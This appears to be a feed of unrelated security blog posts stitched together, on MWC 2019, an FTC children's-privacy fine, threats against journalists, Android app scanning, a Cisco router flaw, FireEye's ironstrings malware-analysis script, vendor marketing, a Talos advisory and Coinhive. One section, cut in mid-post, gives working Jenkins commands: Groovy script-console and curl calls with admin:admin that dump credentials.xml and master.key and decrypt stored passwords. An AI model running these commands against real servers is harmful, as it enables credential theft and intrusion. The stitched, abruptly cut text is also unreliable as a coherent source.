The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:
Foldable Phones Are the Future
MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it encloses like a book. Although neither of these devices are available at to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.
Smart Home Technology Goes Mobile
Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.
Enhancing the Gaming Experience with 5G, VR, and AR
Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersed gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Uniteapp, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each players’ phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.
Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.
Bringing 4G and 5G to the Automotive Industry
Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.
Securing Consumers On-the-Go
The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.
And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part of help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.
While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.
The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.
On February 27, 2019, the Federal Trade Commission announced a record $5.7 million civil penalty against popular video creation and sharing app Music.ly (now known as TikTok) for violations of U.S. children’s privacy rules. According to the FTC’s complaint, Music.ly is designed to appeal to young children (among others), and the company was aware that a significant percentage of Music.ly users were children under the age of 13. The FTC also alleged that Music.ly gained actual knowledge of underage use from parents who unsuccessfully sought to have their children’s information deleted. Under the FTC’s settlement, in addition to paying the penalty, Music.ly must destroy or obtain parental consent for all previously improperly collected children’s information.
The California Attorney General’s office is threatening reporters with legal action merely for possessing a list of the state’s law enforcement officers that have been convicted of crimes — obtained through a public records request.
In a Jan. 29 letter to journalists Jason Paladino and Robert Lewis, California Attorney General Xavier Becerra’s office called possession of the list a crime.
“You are hereby on notice that the unauthorized receipt or possession of a record from the Department's ACHS or information obtained from such a record is a misdemeanor. (Pen. Code § 11143.),” reads the letter from Becerra’s office.
The letter demanded that the reporters destroy the list and refrain from disseminating it, and threatened that “[i]f you do not intend to comply with our request, the Department can take legal action to ensure that the spreadsheets are properly deleted and not disseminated.”
Lewis and Paladino both said that they will not comply with the order to destroy the record.
Lewis was doing some reporting on police that had been arrested, and became interested in which agencies might have records that could illuminate how frequently this happens. Around the same time, Paladino sought data that would shed light on when police officers were disqualified from their positions due to being convicted of crimes.
The reporters — both affiliated with UC Berkeley’s Investigative Reporting Program (IRP) — filed similar requests under California’s public records law in December with the Commission on Peace Officer Standards and Training (POST).
“In January, I got an email that said, ‘Here are the records,’” said Lewis. “But they sent us something we didn’t ask for — it was some sort of redacted training program, completely unrelated to the request. I reached back out and said that they sent the wrong thing, and they said, ‘Sorry, here is the correct document.’”
Lewis and Paladino received a list that included 12,000 names of current and former California police officers, as well as police applicants, that were convicted of crimes. In their report about the list and Becerra’s legal threats for the East Bay Times, they noted that the list included Greg Jeong — who was convicted of impersonating a police officer after failing a police field training program — and Hayward police officer Joshua Cannon, who was convicted of driving under the influence and remains on the force.
While Becerra’s office and POST both sent letters to Lewis and Paladino claiming that the record was released “inadvertently,” it was only disclosed after much back and forth between POST and the reporters.
“It’s not like someone clicked ‘send’ on the wrong thing! They did that the first time!” said Paladino, referring to POST initially emailing the reporters an unrelated record.
“As a reporter, I had the Marine Corps once give me documents that were not fully redacted involving a crash that happened. They weren’t sending me intimidating legal letters; they called me and said they messed up, and asked me not to make protected information public, like people’s names.”
In contrast, Becerra’s office has chosen to respond by threatening reporters with an injunction and even criminal charges.
David Snyder, an attorney at the First Amendment Coalition, said he had never heard of a case like this, and told Freedom of the Press Foundation that two aspects of Becerra’s legal threat are highly unusual:
“One is the somewhat veiled threat to criminally prosecute them for mere possession of this data. And the second is the less veiled threat to get a court order — an injunction — to prevent publication of it,” Snyder said. “As for the first, which says that it’s a misdemeanor to possess the list, the Supreme Court has made clear that if a journalist or anyone else lawfully receives information, they are protected from civil liability for publishing it. And the threat to bring criminal charges is totally groundless under the First Amendment,” he continued.
Snyder also noted that “the California statute that is cited in the letter specifically carves out journalists — that statute that they rely on, consistent with the First Amendment, says you can’t charge journalists with this kind of activity.”
Courts have generally held that prior restraint that come in the form of a court order prohibiting publishing is an unconstitutional violation of the First Amendment. Cases in both the federal Supreme Court and California Supreme Court indicate any prosecution here would also be unconstitutional.
In a statement provided to Freedom of the Press Foundation on Wednesday, a spokesman for the California Department of Justice doubled down on the contention that the journalists are breaking the law:
“The UC Berkeley Investigative Reporting Program is not an entity permitted to possess or use this confidential data. The UC Berkeley Investigative Reporting Program chose to publish the confidential information of Californians despite being alerted by the Department of Justice that doing so was prohibited by law.”
But as Paladino noted, the list is, fundamentally public information. “It’s just convictions, not arrests,” he said. “Maybe there could be more of a privacy concern if they weren’t convictions. But anyone can walk into a courthouse, search the name of a cop, and see what's on the record. It’s summarized public information.”
And besides the three examples of police officer convictions noted in the East Bay Times report, the list has not been published at all in any broad sense.
“Part of the reason we haven’t published is to do due diligence,” Lewis said. “I’ve been a reporter for a number of years, and I’ve done some pretty tough stories, but this is the first time I’ve ever been threatened by a top law enforcement official in this way. It was pretty stunning to be, and it continues to be.”
When Freedom of the Press Foundation followed up with the AG’s office to clarify whether they recognize any of the serious First Amendment concerns with their letter, a spokesperson passed along a statement from Attorney General Becerra himself:
“We always strive to balance the public’s right to know, the need to be transparent and an individual’s right to privacy. In this case, information from a database that’s required by law to be confidential was released erroneously, jeopardizing personal data of individuals across our state. No one wants to shield criminal behavior; we’re subject to the rule of law.”
His response included no reference to the First Amendment.
Posted by Patrick Mutchler and Meghan Kelly, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]
Helping Android app developers build secure apps, free of known vulnerabilities, means helping the overall ecosystem thrive. This is why we launched the Application Security Improvement Program five years ago, and why we're still so invested in its success today.
What the Android Security Improvement Program does
When an app is submitted to the Google Play store, we scan it to determine if a variety of vulnerabilities are present. If we find something concerning, we flag it to the developer and then help them to remedy the situation.
Think of it like a routine physical. If there are no problems, the app runs through our normal tests and continues on the process to being published in the Play Store. If there is a problem, however, we provide a diagnosis and next steps to get back to healthy form.
Over its lifetime, the program has helped more than 300,000 developers to fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users with the same security issues present, which we consider a win.
What vulnerabilities are covered
The App Security Improvement program covers a broad range of security issues in Android apps. These can be as specific as security issues in certain versions of popular libraries (ex: CVE-2015-5256) and as broad as unsafe TLS/SSL certificate validation.
We are continuously improving this program's capabilities by improving the existing checks and launching checks for more classes of security vulnerability. In 2018, we deployed warnings for six additional security vulnerability classes including:
- SQL Injection
- File-based Cross-Site Scripting
- Cross-App Scripting
- Leaked Third-Party Credentials
- Scheme Hijacking
Ensuring that we're continuing to evolve the program as new exploits emerge is a top priority for us. We are continuing to work on this throughout 2019.
Keeping Android users safe is important to Google. We know that app security is often tricky and that developers can make mistakes. We hope to see this program grow in the years to come, helping developers worldwide build apps users can truly trust.
Cisco is warning organizations with remote users that have deployed a particular Cisco wireless firewall, VPN and router to patch a critical vulnerability in each that could let attackers break into the network.
The vulnerability, which has an impact rating of 9.8 out of 10 on the Common Vulnerability Scoring System lets a potential attacker send malicious HTTP requests to a targeted device. A successful exploit could let the attacker execute arbitrary code on the underlying operating system of the affected device as a high-privilege user, Cisco stated.
The vulnerability is in the web-based management interface of three products: Cisco’s RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router. All three products are positioned as remote-access communications and security devices.
Recently we came across a malicious campaign injecting scripts that push fake browser updates onto site visitors.
This is what a typical fake update request looks like:
Users see a message box that says it’s an “Update Center” for your browser type (in my case it’s Firefox, but they also have such messages for Chrome, Internet Explorer and Edge browsers).
The message reads: “A critical error has occurred due to the outdated version of the browser.
The Silent Threat:
Third Party Cyber Risk
Third party risk is now a common and dangerous issue, costing organizations around the globe an estimated $10 billion. Trying to solve this security issue with one-time risk assessments or security scorecards isn’t enough. Organizations need visibility, as well as continuous risk monitoring with real-time alerts to stay ahead of their vendors’ vulnerabilities.
In this white paper, we discuss the dangers of third party risk and answer the following questions:
- Why are third party attacks so common and powerful?
- How do I close the third party visibility gap?
- Why is continuous monitoring essential to combating third party risk?
Download The White Paper:
The Silent Threat: Third Party Cyber Risk
This blog post continues our Script Series where the FireEye Labs Advanced Reverse Engineering (FLARE) team shares tools to aid the malware analysis community. Today, we release ironstrings: a new IDAPython script to recover stackstrings from malware. The script leverages code emulation to overcome this common string obfuscation technique. More precisely, it makes use of our flare-emu tool, which combines IDA Pro and the Unicorn emulation engine. In this blog post, I explain how our new script uses flare-emu to recover stackstrings from malware. In addition, I discuss flare-emu’s event hooks and how you can use them to easily adapt the tool to your own analysis needs.
Analyzing strings in binary files is an important part of malware analysis. Although simple, this reverse engineering technique can provide valuable information about a program’s use and its capabilities. This includes indicators of compromise like file paths and domain names. Especially during advanced analysis, strings are essential to understand a disassembled program’s functionality. Malware authors know this, and string obfuscation is one of the most common anti-analysis techniques reverse engineers encounter.
Due to the prevalence of obfuscated strings, the FLARE team has already developed and shared various tools and techniques to deal with them. In 2014 we published an IDA Pro plugin to automate the recovery of constructed strings in malware. In 2016, we released FLOSS; a standalone open-source tool to automatically identify and decode strings in malware.
Both solutions rely on vivisect, a Python-based program analysis and emulation framework. Although vivisect is a robust tool, it may fail to completely analyze an executable file or emulate its code correctly. And just like any tool, vivisect is susceptible to anti-analysis techniques. With missing, incomplete, or erroneous processing by vivisect, dependent tools cannot provide the best results. Moreover, vivisect does not provide an easy-to-use graphical interface to interactively change and enhance program analysis.
I encountered all these shortcomings recently, when I analyzed a GandCrab ransomware sample (version 5.0.4, SHA256 hash: 72CB1061A10353051DA6241343A7479F73CB81044019EC9A9DB72C41D3B3A2C7). The malware contains various anti-analysis techniques to hinder disassembly and control-flow analysis. Before I could perform any efficient reverse engineering in IDA Pro, I had to overcome these hurdles. I used IDAPython to remove various anti-analysis instruction patterns which then allowed the disassembler to successfully identify all functions in the binary. Many of the recovered functions contained obfuscated strings. Unfortunately, my changes did not propagate to vivisect, because it performs its own independent analysis on the original binary. Consequently, vivisect still failed to recognize most functions correctly and I couldn’t use one of our existing solutions to recover the obfuscated strings.
While I could have tried to feed my patches in IDA Pro back to vivisect or to create a modified binary, I instead created a new IDAPython script that does not depend on vivisect. Thus, circumventing the mentioned shortcomings. It uses IDA Pro’s program analysis and Unicorn’s emulation engine. The easy integration of these two tools is powered by flare-emu.
Using IDA Pro instead of vivisect resolves multiple limitations of our previous implementations. Now changes that users make in their IDB file, e.g. by patching instructions to manually enhance analysis, are immediately available during emulation. Moreover, the tool more robustly supports different architectures including x86, AMD64, and ARM.
Stackstrings: An Example
The disassembly listing in Figure 1 shows an example string obfuscation from the sample I analyzed. The malware creates a string at run-time by moving each character into adjacent stack addresses (gray highlights). Finally, the sample passes the string’s starting offset as an argument to the InternetOpen API call (blue highlight). Manually following these memory moves and restoring strings by hand is a very cumbersome process. Especially if malware complicates value assignments using additional instructions like illustrated below.
Figure 1: Disassembly listing showing stackstring creation and usage
Because malware often uses stack memory to create such strings, Jay Smith coined the term stackstrings for this anti-analysis technique. Note that malware can also construct strings in global memory. Our new script handles both cases; strings constructed on the stack and in global memory.
ironstrings: Stackstring Recovery Using flare-emu
The new IDAPython script is an evolution of our existing solutions. It combines FLOSS’s stackstring recovery algorithm and functionality from our IDA Pro plugin. The script relies on IDA Pro’s program analysis and emulates code using Unicorn. The combination of both tools is powered by flare-emu. Fe, short for flare-emu, is the chemical symbol for iron and hence the script is named ironstrings.
To recover stackstrings, ironstrings enumerates all disassembled functions in a program except for library and thunk functions as identified by IDA Pro. For each function, the script emulates various code paths through the function and searches for stackstrings based on two heuristics:
- Before all call instructions in the function. As stackstrings are often constructed and then passed to other functions, i.e. Windows APIs like CreateFile or InternetOpenUrl.
- At the end of a basic block containing more than five memory writes. The number of memory writes is configurable. This heuristic is helpful if the same memory buffer is used multiple times in a function and if the string construction spans multiple basic blocks.
If any of these conditions apply, the script searches the function’s current stack frame for printable ASCII and UTF-16 strings. To detect strings in global memory, the script additionally searches for strings in all memory locations that have been written to.
Using flare-emu Hooks to Recover Stackstrings
If you’re not already familiar with flare-emu, I recommend reading our previous blog post. It discusses some of the interfaces the tool provides. Other helpful resources are the examples and the project documentation available on the flare-emu GitHub.
The stackstrings script uses flare-emu’s iterateAllPaths API. The function iterates multiple code paths through a function. It first finds possible paths from function start to function end. The tool then forces the emulation down all identified code paths independent from the actual program state. This extensive code coverage allows ironstrings to recover strings constructed from many different emulation runs.
A key feature of flare-emu are the various hook functions that get triggered by different emulation events. These hooks, or callbacks, enable the development of very powerful automation tasks. The available hooks are a combination of Unicorn’s standard hooks, e.g., to hook memory access events, and multiple convenience hooks provided by flare-emu. The following section briefly describes the available callbacks in flare-emu and illustrates how the ironstrings script uses them to recover obfuscated strings.
- instructionHook: This Unicorn standard hook is triggered before an instruction is emulated. ironstrings uses this hook to initiate the stackstrings extraction if a basic block contained enough memory writes, for example.
- memAccessHook: This Unicorn standard hook is triggered when memory read or write events occur during emulation. In the stackstrings script this function stores data about all memory writes.
- callHook: This flare-emu hook is activated before each function call. The hook’s return value is ignored. In the stackstrings script this hook triggers the extraction of stackstrings.
- preEmuCallback: This flare-emu hook is called before each emulation run. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. ironstrings does not use this hook.
- targetCallback: This flare-emu hook gets called whenever one of the specified target addresses is hit. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. The stackstrings script does not use this hook.
The code in Figure 2 shows the callback functions that flare-emu’s API currently supports, their signatures, and examples of how to use them. All callbacks receive an argument named hookData. This named dictionary allows the user to provide application specific data to use before, during, and after emulation. Often, this dictionary is named userData in the user-defined callbacks, as in the examples below, due to its naming in Unicorn. ironstrings uses this to access function analysis data and store recovered strings across its various hooks. The dictionary also provides access to the EmuHelper object and emulation meta data.
Figure 2: flare-emu example hook implementations
Note that both flare-emu and ironstrings were written using the new IDAPython API available in IDA Pro 7.0 and higher. They are not backwards compatible with previous program versions.
Usage and Options
To run the script in IDA Pro, go to File – Script File... (ALT+F7) and select ironstrings.py. The script runs automatically on all functions, prints its results to IDA Pro's output window, and adds comments at the locations where it recovered stackstrings. Figure 3 shows the script’s output of the recovered stackstring locations from the GandCrab sample. Analysis of this malware takes the script about 15 seconds.
Figure 3: Deobfuscated stackstrings and locations where they were identified
Figure 4 shows the disassembly listing of the stackstring creation example discussed at the beginning of this post after running ironstrings.
Figure 4: Commented stackstring after running ironstrings
After analyzing a sample, the script provides a summary and a unique listing of all recovered strings. The output for the ransomware sample is shown in Figure 5. Here the tool failed to analyze two functions due to invalid memory operations during Unicorn’s code emulation.
Figure 5: Script summary and unique string listing
Note that you can modify various options to change the script’s behavior. For example, you can configure the output format at the top of the ironstrings.py file. The script’s README file explains the options in more detail.
This blog post explains how our new IDAPython script ironstrings works and how you can use it to automatically recover stackstrings in IDA Pro. Overcoming anti-analysis techniques is just one of many useful applications of code emulation for malware analysis. This post shows that flare-emu provides the ideal base for this by integrating IDA Pro and Unicorn. The detailed discussion of flare-emu’s hook functions will help you to write your own powerful automation scripts. Please reach out to us with questions, suggestions and feedback via the flare-emu and flare-ida GitHub issue trackers.
Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.
A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While all enterprises are moving to hosted applications or virtualized software hosted on Infrastructure as a Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for them to become all cloud — if ever.
In other words, many, if not most enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.
In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.
With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.
Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN) as well as our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.
Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.
To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.
Imperva will also be at the AWS booth (1227 in the South Expo hall), where you’ll be able to hear how one of our cloud customers, an U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth. You can also see a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm.
Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!
Time and time again, organizations learn the hard way that no matter which security solutions they have in place, if they haven’t properly secured the end user, their efforts can be easily rendered moot.
The classic slip-up most often associated with end-user-turned-insider-threat is falling for a phishing email that in turn infects the endpoint. Now imagine that end user is someone with access to highly-sensitive information.
In a recently released report, Forrester noted that 80 percent of data breaches are related to compromised privileged credentials, highlighting the need for secure identity and access management (IAM).
IAM is a framework of policies and technologies that ensure that the proper people in an enterprise have the appropriate access to resources. Identity and access management products provide IT managers with the tools necessary to control user access to critical information within an organization, whether that’s employees or customers. IAM tools help define and manage the roles and access privileges of individual network users, as well as the circumstances in which users are granted (or denied) those privileges.
Therefore, having a strong identity and access management solution is critical to the security of your organization. It ensures that the right people have access to your system—and keeps unauthorized users out.
When it comes to an IAM solution, organizations have two basic options: build it or buy it. How do you know which option is the right one for your business? Here are the factors you need to consider.
When deciding between building and buying an access management solution, the first step is to assess the company’s cybersecurity needs and potential risks. A good question to ask is: What’s at stake if your organization is compromised or breached? Are you in a field that regularly manages private or sensitive proprietary data, such as genetic research or wealth portfolio management? Do you store large databases of customers’ personally identifiable information (PII)? Consider what the consequences would be if an unauthorized person gained access to your system.
Once you’ve assessed the company’s risk, consider whether your development team could build in the security safeguards needed to manage those risks. If you have especially complex or demanding security needs, building the necessary protections into your existing system will be more difficult.
If your in-house engineering team does not have security experience, consider partnering with third parties for security testing, audits, and other services. Having a trusted third party look at your system can help ensure your security measures are sufficient.
Another factor to consider is whether you partner with any other third parties, such as software-as-a-service providers, that enable features within your system. If so, you’ll need to assess the security aspects of these third parties as well and whether they could better integrate with a homemade or other third-party solution.
Capabilities and available resources
Even if your development staff is skilled, keep in mind that building an access management solution requires a specific skill set. Evaluate the skills, knowledge, and background of your current team members and consider whether you would need to hire additional staff to complete the build.
Building your own solution will also take a considerable amount of time. Do you have enough development resources for this project? Even if you do, think about whether building an IAM solution is the most high-value task your team could be working on. There may be other more profitable projects you may want to prioritize, especially because so many pre-built solutions are available.
Remember, too, that building your solution won’t be a one-time investment. You’ll also have to dedicate time and resources to maintaining and updating your system.
The best option for your organization depends in part on which resource you have more of—time or money. If you have funding but not time, a pre-built solution is likely best. If your situation is reversed, building your own solution may save you money, providing you have the capabilities needed to build an adequate program.
Complexity of the solution
The complexity of the solution you need will also influence whether or not it’s possible to build your own with the resources and capabilities you have. If you only have one or two simple applications and a small number of users, you may be able to build a system on your own relatively easily.
If, however, your system includes large numbers of applications and users with a wide range of necessary privileges, building and maintaining an access management solution will be more challenging.
Also, consider the potential that your company might expand the number of applications or users in the near future. Is your company likely to grow substantially within the next few years? If it does, can your custom-built solution scale? Can a third-party solution do the same?
Third-party verification needs
Another consideration is the possible need for third-party verification, industry standards compliance, and regulatory compliance. You might be subject to certain rules based on your sector, location, or the type of data you handle. Ensuring you comply with these requirements adds an extra layer of complication to building or buying a solution.
Pre-built systems, however, may already comply with the necessary standards. Make sure you have a thorough understanding of all compliance requirements that impact you before you begin building a solution or looking for one to purchase.
How quickly does your access management solution need to be up and running? If it’s a matter of security, that timeframe might be significantly shorter.
Building an access management solution is a time-intensive process, so if you need your solution to be ready quickly, this is not the best option. Purchasing a pre-built solution will enable you to roll out your new access management solution much more quickly than building one on your own would.
To build or to buy
Your identity and access management solution will be an important component for the security and accessibility of your system, both for employees and customers. It’s crucial that you employ a solution that adequately meets your organization’s needs. That’s why choosing between building and buying an access management solution is such an important decision.
To ensure you choose the right option, make sure you ask the right questions when evaluating the needs of your organization.
The post Key considerations for building vs. buying identity access management solutions appeared first on Malwarebytes Labs.
passwd = hudson.util.Secret.decrypt(hashed_pw)
You need to perform this on the the Jenkins system itself as it's using the local master.key and hudson.util.Secret
Code to get the credentials.xml from the script console
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
println "out> $sout err> $serr"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
println "out> $sout err> $serr"
If you just want to do it with curl you can hit the scriptText endpoint and do something like this:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"
Also because this syntax took me a minute to figure out for files in subdirectories:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"
Then to decrypt any passwords:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"
If you are in a position where you have the files but no access to jenkins you can use:
There is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.
Edit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets...read the credentials.xml file :-)
Emmanuel Tacheau of Cisco Talos discovered this vulnerability.
Executive summaryAntenna House Rainbow PDF Office Server Document Converter contains a heap overflow vulnerability that could allow an attacker to remotely execute code on the victim machine. Rainbow PDF is a software solution that converts Microsoft Office documents into a PDF. This specific flaw lies in the way the software converts PowerPoint files into PDFs.
In accordance with our coordinated disclosure policy, Cisco Talos worked with Antenna House to ensure that these issues are resolved and that an update is available for affected customers.
Vulnerability detailsAntenna House Rainbow PDF Office Server Document Converter getSummaryInformation NumProperties code execution vulnerability (TALOS-2018-0780/CVE-2019-5019)
A heap overflow vulnerability exists in the PowerPoint document conversion function of Rainbow PDF Office Server Document Converter V7.0 Pro R1 (7,0,2018,1113). While parsing Document Summary Property Set stream, the getSummaryInformation function is incorrectly checking the correlation between size and the number of properties in PropertySet packets, causing an out-of-bounds write that leads to heap corruption and consequent code execution.
Read the complete vulnerability advisory here for additional information.
Versions testedTalos tested and confirmed that Antenna House Rainbow PDF, version 7.0 Pro R1 for Linux64 (7,0,2018,1113) is impacted by this vulnerability.
CoverageThe following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.
Snort Rules: 49209, 49210
Employees use their mobile devices to be proactive and stay connected in both their personal and work lives. The movement to the cloud has allowed employees to check email, download documents, and share information that may contain sensitive information, even when they’re not on an enterprise network. Businesses must protect their enterprise environments and combat threats that target their employees as average consumers.
McAfee research shows that every mobile-enabled device is subject to some type of malicious exploit. In 2018, McAfee researchers discovered mobile malware named TimpDoor, which turned Android devices into hidden proxies. But in 2019, businesses should be prepared for malware that goes beyond mobile devices too.
Detections of backdoors, cryptomining, fake apps, and banking Trojans all increased substantially in the second half of 2018 and attacks on other connected household devices gained momentum as well. While hidden apps like Adware remain by far the most common form of mobile malware, others are growing and learning how to infect other devices.
Mobile devices are becoming a hub for ransomware and malware developers. One common thread through much of the mobile attack landscape is the quest for illicit profits. Criminals are looking for ways to maximize their income and shift tactics in response to changes in the market.
“75% rise in banking Trojans, enabling cybercriminals to steal financial credentials from mobile devices”
“550% increase in mobile malware realized by the end of 2018”
Weak to non-existent security controls from manufacturers and a lack of simple evasion techniques, such as changing the default username and password, make connected devices in the home and workplace targets for cybercriminals.
Although mobile devices have become key enablers for business productivity and connectivity, they’re still the greatest risk to enterprises today. This changes how enterprises need to secure the mobile devices that connect to their environment. Enterprises must invest in endpoint security solutions to protect themselves from the evolving threat landscape. Mobile is one of the fastest growing endpoints and needs to be protected just as much as laptops and desktop computers.
McAfee has addressed the growing need by introducing the MVISION portfolio family, which provides IT administrators with comprehension and control through one single management console. McAfee MVISION Mobile provides on-device detection, local (end user) threat remediation, visual mapping of nearby dangerous networks, customizable on-device user notifications, and advanced threat detection. This provides the enterprise-class threat defense that businesses today need to be secure.
Read the McAfee Mobile Threat Report to learn more about protecting your employees’ mobile devices from malware and other cyberthreats.
The post Mobile Threat Report Commentary: Mobile Malware is Not Going Away appeared first on McAfee Blogs.
The service became notorious for its use by ne’er-do-wells looking to make a quick buck by hijacking the processing power of victim machines to generate virtual money
The post Coinhive cryptocurrency miner to call it a day next week appeared first on WeLiveSecurity
